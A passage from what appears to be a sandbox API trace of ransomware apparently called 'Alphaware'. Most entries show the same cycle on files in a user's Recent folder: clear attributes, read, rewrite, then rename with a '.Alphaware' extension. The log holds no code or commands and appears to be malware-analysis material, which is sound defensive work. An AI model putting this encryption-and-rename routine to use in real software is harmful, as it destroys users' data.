lpFileInformation=0x255f860*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf870f60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed)) returned 1 [0095.415] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.415] ReadFile (in: hFile=0x250, lpBuffer=0x255ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x255ffa0*, lpNumberOfBytesRead=0x23e958*=0x3ed, lpOverlapped=0x0) returned 1 [0095.472] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.475] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b1c2040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0095.475] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7ord0oMkDdqdZwcFM7PM.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7ord0omkddqdzwcfm7pm.mkv.lnk.alphaware")) returned 1 [0095.477] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk", dwFileAttributes=0x80) returned 1 [0095.477] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25e15d8 | out: lpFileInformation=0x25e15d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd091a960, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd091a960, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd091a960, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13a9)) returned 1 [0095.478] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.478] ReadFile (in: hFile=0x250, lpBuffer=0x25e18d0, nNumberOfBytesToRead=0x13a9, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25e18d0*, lpNumberOfBytesRead=0x23e958*=0x13a9, lpOverlapped=0x0) returned 1 [0095.518] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd091a960, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd091a960, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b20e300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b08)) returned 1 [0095.522] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7xJk20t-OlNiKzpOa_.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\7xjk20t-olnikzpoa_.lnk.alphaware")) returned 1 [0095.524] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk", dwFileAttributes=0x80) returned 1 [0095.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x246d0c8 | out: lpFileInformation=0x246d0c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce9b6740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1573b80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1573b80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8ba)) returned 1 [0095.524] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.525] ReadFile (in: hFile=0x250, lpBuffer=0x246dc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246dc38*, lpNumberOfBytesRead=0x23e958*=0x8ba, lpOverlapped=0x0) returned 1 [0095.563] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9b6740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1573b80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b280720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc74)) returned 1 [0095.567] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8wsZ.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\8wsz.lnk.alphaware")) returned 1 [0095.569] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk", dwFileAttributes=0x80) returned 1 [0095.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24f2a60 | out: lpFileInformation=0x24f2a60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd14b54a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14b54a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe26)) returned 1 [0095.569] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.570] ReadFile (in: hFile=0x250, lpBuffer=0x24f3b98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24f3b98*, lpNumberOfBytesRead=0x23e958*=0xe26, lpOverlapped=0x0) returned 1 [0095.605] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14b54a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b2f2b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13b4)) returned 1 [0095.608] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\96IsF-4ZdJysw7LW.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\96isf-4zdjysw7lw.lnk.alphaware")) returned 1 [0095.610] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk", dwFileAttributes=0x80) returned 1 [0095.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x257bbb0 | out: lpFileInformation=0x257bbb0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bc8220, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bc8220, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf0)) returned 1 [0095.611] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.611] ReadFile (in: hFile=0x250, lpBuffer=0x257cc70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x257cc70*, lpNumberOfBytesRead=0x23e958*=0xdf0, lpOverlapped=0x0) returned 1 [0095.650] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bc8220, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b364f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374)) returned 1 [0095.653] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9WZXgiA1p9.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\9wzxgia1p9.lnk.alphaware")) returned 1 [0095.655] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk", dwFileAttributes=0x80) returned 1 [0095.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2404430 | out: lpFileInformation=0x2404430*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb90c40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x983)) returned 1 [0095.655] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.656] ReadFile (in: hFile=0x250, lpBuffer=0x2405068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2405068*, lpNumberOfBytesRead=0x23e958*=0x983, lpOverlapped=0x0) returned 1 [0095.679] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b3b1220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88)) returned 1 [0095.682] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ac gZ.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ac gz.lnk.alphaware")) returned 1 [0095.683] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk", dwFileAttributes=0x80) returned 1 [0095.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x248a710 | out: lpFileInformation=0x248a710*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd16583c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16583c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16583c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e8)) returned 1 [0095.684] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.684] ReadFile (in: hFile=0x250, lpBuffer=0x248adf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x248adf0*, lpNumberOfBytesRead=0x23e958*=0x3e8, lpOverlapped=0x0) returned 1 [0095.707] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16583c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16583c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b3fd4e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0095.710] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AcoFPdLUL2Wyq3ljkzb.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\acofpdlul2wyq3ljkzb.lnk.alphaware")) returned 1 [0095.711] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk", dwFileAttributes=0x80) returned 1 [0095.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x250c3e0 | out: lpFileInformation=0x250c3e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd01f6760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd01f6760, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1846)) returned 1 [0095.712] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.712] ReadFile (in: hFile=0x250, lpBuffer=0x250c6b8, nNumberOfBytesToRead=0x1846, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x250c6b8*, lpNumberOfBytesRead=0x23e958*=0x1846, lpOverlapped=0x0) returned 1 [0095.733] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd01f6760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b423640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2134)) returned 1 [0095.736] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATmiRxTquKvSIqb.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\atmirxtqukvsiqb.lnk.alphaware")) returned 1 [0095.737] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk", dwFileAttributes=0x80) returned 1 [0095.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk"), fInfoLevelId=0x0, lpFileInformation=0x259b7c8 | out: lpFileInformation=0x259b7c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd08ce6a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, 